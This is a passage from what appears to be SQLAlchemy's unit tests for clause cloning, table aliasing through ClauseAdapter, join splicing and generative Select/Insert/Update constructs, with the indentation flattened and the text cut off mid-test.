def test_extract(self):
s = select([extract('foo', t1.c.col1).label('col1')])
self.assert_compile(
s,
"SELECT EXTRACT(foo FROM table1.col1) AS col1 FROM table1")
s2 = CloningVisitor().traverse(s).alias()
s3 = select([s2.c.col1])
self.assert_compile(
s,
"SELECT EXTRACT(foo FROM table1.col1) AS col1 FROM table1")
self.assert_compile(s3,
"SELECT anon_1.col1 FROM (SELECT EXTRACT(foo FROM "
"table1.col1) AS col1 FROM table1) AS anon_1")
@testing.emits_warning('.*replaced by another column with the same key')
def test_alias(self):
subq = t2.select().alias('subq')
s = select([t1.c.col1, subq.c.col1],
from_obj=[t1, subq,
t1.join(subq, t1.c.col1 == subq.c.col2)]
)
orig = str(s)
s2 = CloningVisitor().traverse(s)
assert orig == str(s) == str(s2)
s4 = CloningVisitor().traverse(s2)
assert orig == str(s) == str(s2) == str(s4)
s3 = sql_util.ClauseAdapter(table('foo')).traverse(s)
assert orig == str(s) == str(s3)
s4 = sql_util.ClauseAdapter(table('foo')).traverse(s3)
assert orig == str(s) == str(s3) == str(s4)
subq = subq.alias('subq')
s = select([t1.c.col1, subq.c.col1],
from_obj=[t1, subq,
t1.join(subq, t1.c.col1 == subq.c.col2)]
)
s5 = CloningVisitor().traverse(s)
assert orig == str(s) == str(s5)
def test_correlated_select(self):
s = select(['*'], t1.c.col1 == t2.c.col1,
from_obj=[t1, t2]).correlate(t2)
class Vis(CloningVisitor):
def visit_select(self, select):
select.append_whereclause(t1.c.col2 == 7)
self.assert_compile(
select([t2]).where(t2.c.col1 == Vis().traverse(s)),
"SELECT table2.col1, table2.col2, table2.col3 "
"FROM table2 WHERE table2.col1 = "
"(SELECT * FROM table1 WHERE table1.col1 = table2.col1 "
"AND table1.col2 = :col2_1)"
)
def test_this_thing(self):
s = select([t1]).where(t1.c.col1 == 'foo').alias()
s2 = select([s.c.col1])
self.assert_compile(s2,
'SELECT anon_1.col1 FROM (SELECT '
'table1.col1 AS col1, table1.col2 AS col2, '
'table1.col3 AS col3 FROM table1 WHERE '
'table1.col1 = :col1_1) AS anon_1')
t1a = t1.alias()
s2 = sql_util.ClauseAdapter(t1a).traverse(s2)
self.assert_compile(s2,
'SELECT anon_1.col1 FROM (SELECT '
'table1_1.col1 AS col1, table1_1.col2 AS '
'col2, table1_1.col3 AS col3 FROM table1 '
'AS table1_1 WHERE table1_1.col1 = '
':col1_1) AS anon_1')
def test_select_fromtwice_one(self):
t1a = t1.alias()
s = select([1], t1.c.col1 == t1a.c.col1, from_obj=t1a).correlate(t1a)
s = select([t1]).where(t1.c.col1 == s)
self.assert_compile(
s, "SELECT table1.col1, table1.col2, table1.col3 FROM table1 "
"WHERE table1.col1 = "
"(SELECT 1 FROM table1, table1 AS table1_1 "
"WHERE table1.col1 = table1_1.col1)")
s = CloningVisitor().traverse(s)
self.assert_compile(
s, "SELECT table1.col1, table1.col2, table1.col3 FROM table1 "
"WHERE table1.col1 = "
"(SELECT 1 FROM table1, table1 AS table1_1 "
"WHERE table1.col1 = table1_1.col1)")
def test_select_fromtwice_two(self):
s = select([t1]).where(t1.c.col1 == 'foo').alias()
s2 = select([1], t1.c.col1 == s.c.col1, from_obj=s).correlate(t1)
s3 = select([t1]).where(t1.c.col1 == s2)
self.assert_compile(
s3, "SELECT table1.col1, table1.col2, table1.col3 "
"FROM table1 WHERE table1.col1 = "
"(SELECT 1 FROM "
"(SELECT table1.col1 AS col1, table1.col2 AS col2, "
"table1.col3 AS col3 FROM table1 "
"WHERE table1.col1 = :col1_1) "
"AS anon_1 WHERE table1.col1 = anon_1.col1)")
s4 = ReplacingCloningVisitor().traverse(s3)
self.assert_compile(
s4, "SELECT table1.col1, table1.col2, table1.col3 "
"FROM table1 WHERE table1.col1 = "
"(SELECT 1 FROM "
"(SELECT table1.col1 AS col1, table1.col2 AS col2, "
"table1.col3 AS col3 FROM table1 "
"WHERE table1.col1 = :col1_1) "
"AS anon_1 WHERE table1.col1 = anon_1.col1)")
class ClauseAdapterTest(fixtures.TestBase, AssertsCompiledSQL):
__dialect__ = 'default'
@classmethod
def setup_class(cls):
global t1, t2
t1 = table("table1",
column("col1"),
column("col2"),
column("col3"),
)
t2 = table("table2",
column("col1"),
column("col2"),
column("col3"),
)
def test_correlation_on_clone(self):
t1alias = t1.alias('t1alias')
t2alias = t2.alias('t2alias')
vis = sql_util.ClauseAdapter(t1alias)
s = select(['*'], from_obj=[t1alias, t2alias]).as_scalar()
assert t2alias in s._froms
assert t1alias in s._froms
self.assert_compile(select(['*'], t2alias.c.col1 == s),
'SELECT * FROM table2 AS t2alias WHERE '
't2alias.col1 = (SELECT * FROM table1 AS '
't1alias)')
s = vis.traverse(s)
assert t2alias not in s._froms # not present because it's been
# cloned
assert t1alias in s._froms # present because the adapter placed
# it there
# correlate list on "s" needs to take into account the full
# _cloned_set for each element in _froms when correlating
self.assert_compile(select(['*'], t2alias.c.col1 == s),
'SELECT * FROM table2 AS t2alias WHERE '
't2alias.col1 = (SELECT * FROM table1 AS '
't1alias)')
s = select(['*'], from_obj=[t1alias,
t2alias]).correlate(t2alias).as_scalar()
self.assert_compile(select(['*'], t2alias.c.col1 == s),
'SELECT * FROM table2 AS t2alias WHERE '
't2alias.col1 = (SELECT * FROM table1 AS '
't1alias)')
s = vis.traverse(s)
self.assert_compile(select(['*'], t2alias.c.col1 == s),
'SELECT * FROM table2 AS t2alias WHERE '
't2alias.col1 = (SELECT * FROM table1 AS '
't1alias)')
s = CloningVisitor().traverse(s)
self.assert_compile(select(['*'], t2alias.c.col1 == s),
'SELECT * FROM table2 AS t2alias WHERE '
't2alias.col1 = (SELECT * FROM table1 AS '
't1alias)')
s = select(['*']).where(t1.c.col1 == t2.c.col1).as_scalar()
self.assert_compile(select([t1.c.col1, s]),
'SELECT table1.col1, (SELECT * FROM table2 '
'WHERE table1.col1 = table2.col1) AS '
'anon_1 FROM table1')
vis = sql_util.ClauseAdapter(t1alias)
s = vis.traverse(s)
self.assert_compile(select([t1alias.c.col1, s]),
'SELECT t1alias.col1, (SELECT * FROM '
'table2 WHERE t1alias.col1 = table2.col1) '
'AS anon_1 FROM table1 AS t1alias')
s = CloningVisitor().traverse(s)
self.assert_compile(select([t1alias.c.col1, s]),
'SELECT t1alias.col1, (SELECT * FROM '
'table2 WHERE t1alias.col1 = table2.col1) '
'AS anon_1 FROM table1 AS t1alias')
s = select(['*']).where(t1.c.col1
== t2.c.col1).correlate(t1).as_scalar()
self.assert_compile(select([t1.c.col1, s]),
'SELECT table1.col1, (SELECT * FROM table2 '
'WHERE table1.col1 = table2.col1) AS '
'anon_1 FROM table1')
vis = sql_util.ClauseAdapter(t1alias)
s = vis.traverse(s)
self.assert_compile(select([t1alias.c.col1, s]),
'SELECT t1alias.col1, (SELECT * FROM '
'table2 WHERE t1alias.col1 = table2.col1) '
'AS anon_1 FROM table1 AS t1alias')
s = CloningVisitor().traverse(s)
self.assert_compile(select([t1alias.c.col1, s]),
'SELECT t1alias.col1, (SELECT * FROM '
'table2 WHERE t1alias.col1 = table2.col1) '
'AS anon_1 FROM table1 AS t1alias')
@testing.fails_on_everything_except()
def test_joins_dont_adapt(self):
# adapting to a join, i.e. ClauseAdapter(t1.join(t2)), doesn't
# make much sense. ClauseAdapter doesn't make any changes if
# it's against a straight join.
users = table('users', column('id'))
addresses = table('addresses', column('id'), column('user_id'))
ualias = users.alias()
s = select([func.count(addresses.c.id)], users.c.id
== addresses.c.user_id).correlate(users)
s = sql_util.ClauseAdapter(ualias).traverse(s)
j1 = addresses.join(ualias, addresses.c.user_id == ualias.c.id)
self.assert_compile(sql_util.ClauseAdapter(j1).traverse(s),
'SELECT count(addresses.id) AS count_1 '
'FROM addresses WHERE users_1.id = '
'addresses.user_id')
def test_table_to_alias_1(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
ff = vis.traverse(func.count(t1.c.col1).label('foo'))
assert list(_from_objects(ff)) == [t1alias]
def test_table_to_alias_2(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
self.assert_compile(vis.traverse(select(['*'], from_obj=[t1])),
'SELECT * FROM table1 AS t1alias')
def test_table_to_alias_3(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
self.assert_compile(select(['*'], t1.c.col1 == t2.c.col2),
'SELECT * FROM table1, table2 WHERE '
'table1.col1 = table2.col2')
def test_table_to_alias_4(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
self.assert_compile(vis.traverse(select(['*'], t1.c.col1
== t2.c.col2)),
'SELECT * FROM table1 AS t1alias, table2 '
'WHERE t1alias.col1 = table2.col2')
def test_table_to_alias_5(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
self.assert_compile(
vis.traverse(
select(
['*'],
t1.c.col1 == t2.c.col2,
from_obj=[
t1,
t2])),
'SELECT * FROM table1 AS t1alias, table2 '
'WHERE t1alias.col1 = table2.col2')
def test_table_to_alias_6(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
self.assert_compile(
select([t1alias, t2]).where(
t1alias.c.col1 == vis.traverse(
select(['*'], t1.c.col1 == t2.c.col2, from_obj=[t1, t2]).
correlate(t1)
)
),
"SELECT t1alias.col1, t1alias.col2, t1alias.col3, "
"table2.col1, table2.col2, table2.col3 "
"FROM table1 AS t1alias, table2 WHERE t1alias.col1 = "
"(SELECT * FROM table2 WHERE t1alias.col1 = table2.col2)"
)
def test_table_to_alias_7(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
self.assert_compile(
select([t1alias, t2]).
where(t1alias.c.col1 == vis.traverse(
select(['*'], t1.c.col1 == t2.c.col2, from_obj=[t1, t2]).
correlate(t2))),
"SELECT t1alias.col1, t1alias.col2, t1alias.col3, "
"table2.col1, table2.col2, table2.col3 "
"FROM table1 AS t1alias, table2 "
"WHERE t1alias.col1 = "
"(SELECT * FROM table1 AS t1alias "
"WHERE t1alias.col1 = table2.col2)")
def test_table_to_alias_8(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
self.assert_compile(
vis.traverse(case([(t1.c.col1 == 5, t1.c.col2)], else_=t1.c.col1)),
'CASE WHEN (t1alias.col1 = :col1_1) THEN '
't1alias.col2 ELSE t1alias.col1 END')
def test_table_to_alias_9(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
self.assert_compile(
vis.traverse(
case(
[
(5,
t1.c.col2)],
value=t1.c.col1,
else_=t1.c.col1)),
'CASE t1alias.col1 WHEN :param_1 THEN '
't1alias.col2 ELSE t1alias.col1 END')
def test_table_to_alias_10(self):
s = select(['*'], from_obj=[t1]).alias('foo')
self.assert_compile(s.select(),
'SELECT foo.* FROM (SELECT * FROM table1) '
'AS foo')
def test_table_to_alias_11(self):
s = select(['*'], from_obj=[t1]).alias('foo')
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
self.assert_compile(vis.traverse(s.select()),
'SELECT foo.* FROM (SELECT * FROM table1 '
'AS t1alias) AS foo')
def test_table_to_alias_12(self):
s = select(['*'], from_obj=[t1]).alias('foo')
self.assert_compile(s.select(),
'SELECT foo.* FROM (SELECT * FROM table1) '
'AS foo')
def test_table_to_alias_13(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
ff = vis.traverse(func.count(t1.c.col1).label('foo'))
self.assert_compile(select([ff]),
'SELECT count(t1alias.col1) AS foo FROM '
'table1 AS t1alias')
assert list(_from_objects(ff)) == [t1alias]
# def test_table_to_alias_2(self):
# TODO: self.assert_compile(vis.traverse(select([func.count(t1.c
# .col1).l abel('foo')]), clone=True), "SELECT
# count(t1alias.col1) AS foo FROM table1 AS t1alias")
def test_table_to_alias_14(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
t2alias = t2.alias('t2alias')
vis.chain(sql_util.ClauseAdapter(t2alias))
self.assert_compile(vis.traverse(select(['*'], t1.c.col1
== t2.c.col2)),
'SELECT * FROM table1 AS t1alias, table2 '
'AS t2alias WHERE t1alias.col1 = '
't2alias.col2')
def test_table_to_alias_15(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
t2alias = t2.alias('t2alias')
vis.chain(sql_util.ClauseAdapter(t2alias))
self.assert_compile(
vis.traverse(
select(
['*'],
t1.c.col1 == t2.c.col2,
from_obj=[
t1,
t2])),
'SELECT * FROM table1 AS t1alias, table2 '
'AS t2alias WHERE t1alias.col1 = '
't2alias.col2')
def test_table_to_alias_16(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
t2alias = t2.alias('t2alias')
vis.chain(sql_util.ClauseAdapter(t2alias))
self.assert_compile(
select([t1alias, t2alias]).where(
t1alias.c.col1 ==
vis.traverse(select(['*'],
t1.c.col1 == t2.c.col2,
from_obj=[t1, t2]).correlate(t1))
),
"SELECT t1alias.col1, t1alias.col2, t1alias.col3, "
"t2alias.col1, t2alias.col2, t2alias.col3 "
"FROM table1 AS t1alias, table2 AS t2alias "
"WHERE t1alias.col1 = "
"(SELECT * FROM table2 AS t2alias "
"WHERE t1alias.col1 = t2alias.col2)"
)
def test_table_to_alias_17(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
t2alias = t2.alias('t2alias')
vis.chain(sql_util.ClauseAdapter(t2alias))
self.assert_compile(
t2alias.select().where(
t2alias.c.col2 == vis.traverse(
select(
['*'],
t1.c.col1 == t2.c.col2,
from_obj=[
t1,
t2]).correlate(t2))),
'SELECT t2alias.col1, t2alias.col2, t2alias.col3 '
'FROM table2 AS t2alias WHERE t2alias.col2 = '
'(SELECT * FROM table1 AS t1alias WHERE '
't1alias.col1 = t2alias.col2)')
def test_include_exclude(self):
m = MetaData()
a = Table('a', m,
Column('id', Integer, primary_key=True),
Column('xxx_id', Integer,
ForeignKey('a.id', name='adf', use_alter=True)
)
)
e = (a.c.id == a.c.xxx_id)
assert str(e) == "a.id = a.xxx_id"
b = a.alias()
e = sql_util.ClauseAdapter(b, include=set([a.c.id]),
equivalents={a.c.id: set([a.c.id])}
).traverse(e)
assert str(e) == "a_1.id = a.xxx_id"
def test_recursive_equivalents(self):
m = MetaData()
a = Table('a', m, Column('x', Integer), Column('y', Integer))
b = Table('b', m, Column('x', Integer), Column('y', Integer))
c = Table('c', m, Column('x', Integer), Column('y', Integer))
# force a recursion overflow, by linking a.c.x<->c.c.x, and
# asking for a nonexistent col. corresponding_column should prevent
# endless depth.
adapt = sql_util.ClauseAdapter(
b, equivalents={a.c.x: set([c.c.x]), c.c.x: set([a.c.x])})
assert adapt._corresponding_column(a.c.x, False) is None
def test_multilevel_equivalents(self):
m = MetaData()
a = Table('a', m, Column('x', Integer), Column('y', Integer))
b = Table('b', m, Column('x', Integer), Column('y', Integer))
c = Table('c', m, Column('x', Integer), Column('y', Integer))
alias = select([a]).select_from(a.join(b, a.c.x == b.c.x)).alias()
# two levels of indirection from c.x->b.x->a.x, requires recursive
# corresponding_column call
adapt = sql_util.ClauseAdapter(
alias, equivalents={b.c.x: set([a.c.x]), c.c.x: set([b.c.x])})
assert adapt._corresponding_column(a.c.x, False) is alias.c.x
assert adapt._corresponding_column(c.c.x, False) is alias.c.x
def test_join_to_alias(self):
metadata = MetaData()
a = Table('a', metadata,
Column('id', Integer, primary_key=True))
b = Table('b', metadata,
Column('id', Integer, primary_key=True),
Column('aid', Integer, ForeignKey('a.id')),
)
c = Table('c', metadata,
Column('id', Integer, primary_key=True),
Column('bid', Integer, ForeignKey('b.id')),
)
d = Table('d', metadata,
Column('id', Integer, primary_key=True),
Column('aid', Integer, ForeignKey('a.id')),
)
j1 = a.outerjoin(b)
j2 = select([j1], use_labels=True)
j3 = c.join(j2, j2.c.b_id == c.c.bid)
j4 = j3.outerjoin(d)
self.assert_compile(j4,
'c JOIN (SELECT a.id AS a_id, b.id AS '
'b_id, b.aid AS b_aid FROM a LEFT OUTER '
'JOIN b ON a.id = b.aid) ON b_id = c.bid '
'LEFT OUTER JOIN d ON a_id = d.aid')
j5 = j3.alias('foo')
j6 = sql_util.ClauseAdapter(j5).copy_and_process([j4])[0]
# this statement takes c join(a join b), wraps it inside an
# aliased "select * from c join(a join b) AS foo". the outermost
# right side "left outer join d" stays the same, except "d"
# joins against foo.a_id instead of plain "a_id"
self.assert_compile(j6,
'(SELECT c.id AS c_id, c.bid AS c_bid, '
'a_id AS a_id, b_id AS b_id, b_aid AS '
'b_aid FROM c JOIN (SELECT a.id AS a_id, '
'b.id AS b_id, b.aid AS b_aid FROM a LEFT '
'OUTER JOIN b ON a.id = b.aid) ON b_id = '
'c.bid) AS foo LEFT OUTER JOIN d ON '
'foo.a_id = d.aid')
def test_derived_from(self):
assert select([t1]).is_derived_from(t1)
assert not select([t2]).is_derived_from(t1)
assert not t1.is_derived_from(select([t1]))
assert t1.alias().is_derived_from(t1)
s1 = select([t1, t2]).alias('foo')
s2 = select([s1]).limit(5).offset(10).alias()
assert s2.is_derived_from(s1)
s2 = s2._clone()
assert s2.is_derived_from(s1)
def test_aliasedselect_to_aliasedselect_straight(self):
# original issue from ticket #904
s1 = select([t1]).alias('foo')
s2 = select([s1]).limit(5).offset(10).alias()
self.assert_compile(sql_util.ClauseAdapter(s2).traverse(s1),
'SELECT foo.col1, foo.col2, foo.col3 FROM '
'(SELECT table1.col1 AS col1, table1.col2 '
'AS col2, table1.col3 AS col3 FROM table1) '
'AS foo LIMIT :param_1 OFFSET :param_2',
{'param_1': 5, 'param_2': 10})
def test_aliasedselect_to_aliasedselect_join(self):
s1 = select([t1]).alias('foo')
s2 = select([s1]).limit(5).offset(10).alias()
j = s1.outerjoin(t2, s1.c.col1 == t2.c.col1)
self.assert_compile(sql_util.ClauseAdapter(s2).traverse(j).select(),
'SELECT anon_1.col1, anon_1.col2, '
'anon_1.col3, table2.col1, table2.col2, '
'table2.col3 FROM (SELECT foo.col1 AS '
'col1, foo.col2 AS col2, foo.col3 AS col3 '
'FROM (SELECT table1.col1 AS col1, '
'table1.col2 AS col2, table1.col3 AS col3 '
'FROM table1) AS foo LIMIT :param_1 OFFSET '
':param_2) AS anon_1 LEFT OUTER JOIN '
'table2 ON anon_1.col1 = table2.col1',
{'param_1': 5, 'param_2': 10})
def test_aliasedselect_to_aliasedselect_join_nested_table(self):
s1 = select([t1]).alias('foo')
s2 = select([s1]).limit(5).offset(10).alias()
talias = t1.alias('bar')
assert not s2.is_derived_from(talias)
j = s1.outerjoin(talias, s1.c.col1 == talias.c.col1)
self.assert_compile(sql_util.ClauseAdapter(s2).traverse(j).select(),
'SELECT anon_1.col1, anon_1.col2, '
'anon_1.col3, bar.col1, bar.col2, bar.col3 '
'FROM (SELECT foo.col1 AS col1, foo.col2 '
'AS col2, foo.col3 AS col3 FROM (SELECT '
'table1.col1 AS col1, table1.col2 AS col2, '
'table1.col3 AS col3 FROM table1) AS foo '
'LIMIT :param_1 OFFSET :param_2) AS anon_1 '
'LEFT OUTER JOIN table1 AS bar ON '
'anon_1.col1 = bar.col1', {'param_1': 5,
'param_2': 10})
def test_functions(self):
self.assert_compile(
sql_util.ClauseAdapter(t1.alias()).
traverse(func.count(t1.c.col1)),
'count(table1_1.col1)')
s = select([func.count(t1.c.col1)])
self.assert_compile(sql_util.ClauseAdapter(t1.alias()).traverse(s),
'SELECT count(table1_1.col1) AS count_1 '
'FROM table1 AS table1_1')
def test_recursive(self):
metadata = MetaData()
a = Table('a', metadata,
Column('id', Integer, primary_key=True))
b = Table('b', metadata,
Column('id', Integer, primary_key=True),
Column('aid', Integer, ForeignKey('a.id')),
)
c = Table('c', metadata,
Column('id', Integer, primary_key=True),
Column('bid', Integer, ForeignKey('b.id')),
)
d = Table('d', metadata,
Column('id', Integer, primary_key=True),
Column('aid', Integer, ForeignKey('a.id')),
)
u = union(
a.join(b).select().apply_labels(),
a.join(d).select().apply_labels()
).alias()
self.assert_compile(
sql_util.ClauseAdapter(u).
traverse(select([c.c.bid]).where(c.c.bid == u.c.b_aid)),
"SELECT c.bid "
"FROM c, (SELECT a.id AS a_id, b.id AS b_id, b.aid AS b_aid "
"FROM a JOIN b ON a.id = b.aid UNION SELECT a.id AS a_id, d.id "
"AS d_id, d.aid AS d_aid "
"FROM a JOIN d ON a.id = d.aid) AS anon_1 "
"WHERE c.bid = anon_1.b_aid"
)
class SpliceJoinsTest(fixtures.TestBase, AssertsCompiledSQL):
__dialect__ = 'default'
@classmethod
def setup_class(cls):
global table1, table2, table3, table4
def _table(name):
return table(name, column('col1'), column('col2'),
column('col3'))
table1, table2, table3, table4 = [
_table(name) for name in (
'table1', 'table2', 'table3', 'table4')]
def test_splice(self):
t1, t2, t3, t4 = table1, table2, table1.alias(), table2.alias()
j = t1.join(
t2,
t1.c.col1 == t2.c.col1).join(
t3,
t2.c.col1 == t3.c.col1).join(
t4,
t4.c.col1 == t1.c.col1)
s = select([t1]).where(t1.c.col2 < 5).alias()
self.assert_compile(sql_util.splice_joins(s, j),
'(SELECT table1.col1 AS col1, table1.col2 '
'AS col2, table1.col3 AS col3 FROM table1 '
'WHERE table1.col2 < :col2_1) AS anon_1 '
'JOIN table2 ON anon_1.col1 = table2.col1 '
'JOIN table1 AS table1_1 ON table2.col1 = '
'table1_1.col1 JOIN table2 AS table2_1 ON '
'table2_1.col1 = anon_1.col1')
def test_stop_on(self):
t1, t2, t3 = table1, table2, table3
j1 = t1.join(t2, t1.c.col1 == t2.c.col1)
j2 = j1.join(t3, t2.c.col1 == t3.c.col1)
s = select([t1]).select_from(j1).alias()
self.assert_compile(sql_util.splice_joins(s, j2),
'(SELECT table1.col1 AS col1, table1.col2 '
'AS col2, table1.col3 AS col3 FROM table1 '
'JOIN table2 ON table1.col1 = table2.col1) '
'AS anon_1 JOIN table2 ON anon_1.col1 = '
'table2.col1 JOIN table3 ON table2.col1 = '
'table3.col1')
self.assert_compile(sql_util.splice_joins(s, j2, j1),
'(SELECT table1.col1 AS col1, table1.col2 '
'AS col2, table1.col3 AS col3 FROM table1 '
'JOIN table2 ON table1.col1 = table2.col1) '
'AS anon_1 JOIN table3 ON table2.col1 = '
'table3.col1')
def test_splice_2(self):
t2a = table2.alias()
t3a = table3.alias()
j1 = table1.join(
t2a,
table1.c.col1 == t2a.c.col1).join(
t3a,
t2a.c.col2 == t3a.c.col2)
t2b = table4.alias()
j2 = table1.join(t2b, table1.c.col3 == t2b.c.col3)
self.assert_compile(sql_util.splice_joins(table1, j1),
'table1 JOIN table2 AS table2_1 ON '
'table1.col1 = table2_1.col1 JOIN table3 '
'AS table3_1 ON table2_1.col2 = '
'table3_1.col2')
self.assert_compile(sql_util.splice_joins(table1, j2),
'table1 JOIN table4 AS table4_1 ON '
'table1.col3 = table4_1.col3')
self.assert_compile(
sql_util.splice_joins(
sql_util.splice_joins(
table1,
j1),
j2),
'table1 JOIN table2 AS table2_1 ON '
'table1.col1 = table2_1.col1 JOIN table3 '
'AS table3_1 ON table2_1.col2 = '
'table3_1.col2 JOIN table4 AS table4_1 ON '
'table1.col3 = table4_1.col3')
class SelectTest(fixtures.TestBase, AssertsCompiledSQL):
"""tests the generative capability of Select"""
__dialect__ = 'default'
@classmethod
def setup_class(cls):
global t1, t2
t1 = table("table1",
column("col1"),
column("col2"),
column("col3"),
)
t2 = table("table2",
column("col1"),
column("col2"),
column("col3"),
)
def test_columns(self):
s = t1.select()
self.assert_compile(s,
'SELECT table1.col1, table1.col2, '
'table1.col3 FROM table1')
select_copy = s.column('yyy')
self.assert_compile(select_copy,
'SELECT table1.col1, table1.col2, '
'table1.col3, yyy FROM table1')
assert s.columns is not select_copy.columns
assert s._columns is not select_copy._columns
assert s._raw_columns is not select_copy._raw_columns
self.assert_compile(s,
'SELECT table1.col1, table1.col2, '
'table1.col3 FROM table1')
def test_froms(self):
s = t1.select()
self.assert_compile(s,
'SELECT table1.col1, table1.col2, '
'table1.col3 FROM table1')
select_copy = s.select_from(t2)
self.assert_compile(select_copy,
'SELECT table1.col1, table1.col2, '
'table1.col3 FROM table1, table2')
assert s._froms is not select_copy._froms
self.assert_compile(s,
'SELECT table1.col1, table1.col2, '
'table1.col3 FROM table1')
def test_prefixes(self):
s = t1.select()
self.assert_compile(s,
'SELECT table1.col1, table1.col2, '
'table1.col3 FROM table1')
select_copy = s.prefix_with('FOOBER')
self.assert_compile(select_copy,
'SELECT FOOBER table1.col1, table1.col2, '
'table1.col3 FROM table1')
self.assert_compile(s,
'SELECT table1.col1, table1.col2, '
'table1.col3 FROM table1')
def test_execution_options(self):
s = select().execution_options(foo='bar')
s2 = s.execution_options(bar='baz')
s3 = s.execution_options(foo='not bar')
# The original select should not be modified.
assert s._execution_options == dict(foo='bar')
# s2 should have its execution_options based on s, though.
assert s2._execution_options == dict(foo='bar', bar='baz')
assert s3._execution_options == dict(foo='not bar')
def test_invalid_options(self):
assert_raises(
exc.ArgumentError,
select().execution_options, compiled_cache={}
)
assert_raises(
exc.ArgumentError,
select().execution_options,
isolation_level='READ_COMMITTED'
)
# this feature not available yet
def _NOTYET_test_execution_options_in_kwargs(self):
s = select(execution_options=dict(foo='bar'))
s2 = s.execution_options(bar='baz')
# The original select should not be modified.
assert s._execution_options == dict(foo='bar')
# s2 should have its execution_options based on s, though.
assert s2._execution_options == dict(foo='bar', bar='baz')
# this feature not available yet
def _NOTYET_test_execution_options_in_text(self):
s = text('select 42', execution_options=dict(foo='bar'))
assert s._execution_options == dict(foo='bar')
class ValuesBaseTest(fixtures.TestBase, AssertsCompiledSQL):
"""Tests the generative capability of Insert, Update"""
__dialect__ = 'default'
# fixme: consolidate converage from elsewhere here and expand
@classmethod
def setup_class(cls):
global t1, t2
t1 = table("table1",
column("col1"),
column("col2"),
column("col3"),
)
t2 = table("table2",
column("col1"),
column("col2"),
column("col3"),
)
def test_prefixes(self):
i = t1.insert()
self.assert_compile(i,
"INSERT INTO table1 (col1, col2, col3) "
"VALUES (:col1, :col2, :col3)")
gen = i.prefix_with("foober")
self.assert_compile(gen,
"INSERT foober INTO table1 (col1, col2, col3) "
"VALUES (:col1, :col2, :col3)")
self.assert_compile(i,
"INSERT INTO table1 (col1, col2, col3) "
"VALUES (:col1, :col2, :col3)")
i2 = t1.insert(prefixes=['squiznart'])
self.assert_compile(i2,
"INSERT squiznart INTO table1 (col1, col2, col3) "
"VALUES (:col1, :col2, :col3)")
gen2 = i2.prefix_with("quux")
self.assert_compile(gen2,
"INSERT squiznart quux INTO "
"table1 (col1, col2, col3) "
"VALUES (:col1, :col2, :col3)")
def test_add_kwarg(self):
i = t1.insert()
eq_(i.parameters, None)
i = i.values(col1=5)
eq_(i.parameters, {"col1": 5})
i = i.values(col2=7)
eq_(i.parameters, {"col1": 5, "col2": 7})
def test_via_tuple_single(self):
i = t1.insert()
eq_(i.parameters, None)
i = i.values((5, 6, 7))
eq_(i.parameters, {"col1": 5, "col2": 6, "col3": 7})
def test_kw_and_dict_simulatenously_single(self):
i = t1.insert()
i = i.values({"col1": 5}, col2=7)
eq_(i.parameters, {"col1": 5, "col2": 7})
def test_via_tuple_multi(self):
i = t1.insert()
eq_(i.parameters, None)
i = i.values([(5, 6, 7), (8, 9, 10)])
eq_(i.parameters, [
{"col1": 5, "col2": 6, "col3": 7},
{"col1": 8, "col2": 9, "col3": 10},
]
)
def test_inline_values_single(self):
i = t1.insert(values={"col1": 5})
eq_(i.parameters, {"col1": 5})
is_(i._has_multi_parameters, False)
def test_inline_values_multi(self):
i = t1.insert(values=[{"col1": 5}, {"col1": 6}])
eq_(i.parameters, [{"col1": 5}, {"col1": 6}])
is_(i._has_multi_parameters, True)
def test_add_dictionary(self):
i = t1.insert()
eq_(i.parameters, None)
i = i.values({"col1": 5})
eq_(i.parameters, {"col1": 5})
is_(i._has_multi_parameters, False)
i = i.values({"col1": 6})
# note replaces
eq_(i.parameters, {"col1": 6})
is_(i._has_multi_parameters, False)
i = i.values({"col2": 7})
eq_(i.parameters, {"col1": 6, "col2": 7})
is_(i._has_multi_parameters, False)
def test_add_kwarg_disallowed_multi(self):
i = t1.insert()
i = i.values([{"col1": 5}, {"col1": 7}])
assert_raises_message(
exc.InvalidRequestError,
"This construct already has multiple parameter sets.",
i.values, col2=7
)
def test_cant_mix_single_multi_formats_dict_to_list(self):
i = t1.insert().values(col1=5)
assert_raises_message(
exc.ArgumentError,
"Can't mix single-values and multiple values "
"formats in one statement",
i.values, [{"col1": 6}]
)
def test_cant_mix_single_multi_formats_list_to_dict(self):
i = t1.insert().values([{"col1": 6}])
assert_raises_message(
exc.ArgumentError,
"Can't mix single-values and multiple values "
"formats in one statement",
i.values, {"col1": 5}
)
def test_erroneous_multi_args_dicts(self):
i = t1.insert()
assert_raises_message(
exc.ArgumentError,
"Only a single dictionary/tuple or list of "
"dictionaries/tuples is accepted positionally.",
i.values, {"col1": 5}, {"col1": 7}
)
def test_erroneous_multi_args_tuples(self):
i = t1.insert()
assert_raises_message(
exc.ArgumentError,
"Only a single dictionary/tuple or list of "
"dictionaries/tuples is accepted positionally.",
i.values, (5, 6, 7), (8, 9, 10)
)
def test_erroneous_multi_args_plus_kw(self):
i = t1.insert()
assert_raises_message(
exc.ArgumentError,
"Can't pass kwargs and multiple parameter sets simultaenously",
i.values, [{"col1": 5}], col2=7
)
def test_update_no_support_multi_values(self):
u = t1.update()
assert_raises_message(
exc.InvalidRequestError,
"This construct does not support multiple parameter sets.",
u.values, [{"col1": 5}, {"col1": 7}]
)
def test_update_no_support_multi_constructor(self):
assert_raises_message(
exc.InvalidRequestError,
"This construct does not support multiple parameter sets.",
